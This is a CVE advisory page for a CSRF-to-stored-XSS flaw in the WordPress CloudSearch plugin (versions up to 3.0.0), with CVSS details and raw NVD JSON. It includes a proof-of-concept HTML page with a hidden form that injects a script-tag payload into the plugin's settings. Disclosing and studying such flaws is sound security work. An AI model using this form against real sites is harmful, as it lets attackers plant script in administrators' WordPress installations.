Security Vulnerability Report
中文
CVE-2025-62962 CVSS 7.1 HIGH

CVE-2025-62962

Published: 2025-10-27 02:15:56
Last Modified: 2026-04-27 17:16:38

Description

Cross-Site Request Forgery (CSRF) vulnerability in Andrea Landonio CloudSearch cloud-search allows Stored XSS.This issue affects CloudSearch: from n/a through <= 3.0.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CloudSearch <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62962 PoC: CSRF to Stored XSS in WordPress CloudSearch Plugin --> <!-- This PoC demonstrates how an attacker can exploit the CSRF vulnerability to inject malicious JavaScript --> <!-- Attack Scenario: Trick WordPress admin into visiting this page --> <!DOCTYPE html> <html> <head> <title>CloudSearch Plugin CSRF to Stored XSS PoC</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .info { background: #f0f0f0; padding: 10px; margin: 10px 0; border-radius: 5px; } .hidden { display: none; } </style> </head> <body> <h2>CVE-2025-62962: CloudSearch CSRF → Stored XSS PoC</h2> <div class="info"> <p><strong>Vulnerability:</strong> CSRF leading to Stored XSS in CloudSearch Plugin</p> <p><strong>Affected Version:</strong> <= 3.0.0</p> <p><strong>CVSS Score:</strong> 7.1 (High)</p> </div> <!-- This form exploits the CSRF vulnerability by: 1. Auto-submitting a crafted request to the CloudSearch plugin endpoint 2. Injecting an XSS payload into the search functionality 3. No CSRF token is required due to missing nonce verification --> <form id="exploitForm" action="http://target-wordpress-site/wp-admin/admin.php?page=cloud-search-settings" method="POST" class="hidden"> <!-- CloudSearch plugin parameter that lacks CSRF protection --> <input type="text" name="cloudsearch_custom_field" value='<script>alert("XSS by CSRF - CVE-2025-62962")</script>'> <input type="text" name="action" value="save_settings"> <input type="submit" id="autoSubmit"> </form> <script> // Auto-submit the form when page loads // This simulates the CSRF attack without user awareness window.onload = function() { console.log("CSRF PoC for CVE-2025-62962 loaded"); // In a real attack, this would auto-submit // document.getElementById('exploitForm').submit(); // Display confirmation for demonstration document.getElementById('status').innerHTML = "PoC Ready: Form will auto-submit on page load in actual attack scenario." + "<br>Target: WordPress admin with CloudSearch plugin installed" + "<br>Payload: <script>alert('XSS by CSRF - CVE-2025-62962')</script>"; }; </script> <p id="status" style="color: green; margin-top: 20px;"></p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62962", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:56.430", "lastModified": "2026-04-27T17:16:38.123", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Andrea Landonio CloudSearch cloud-search allows Stored XSS.This issue affects CloudSearch: from n/a through <= 3.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cloud-search/vulnerability/wordpress-cloudsearch-plugin-3-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}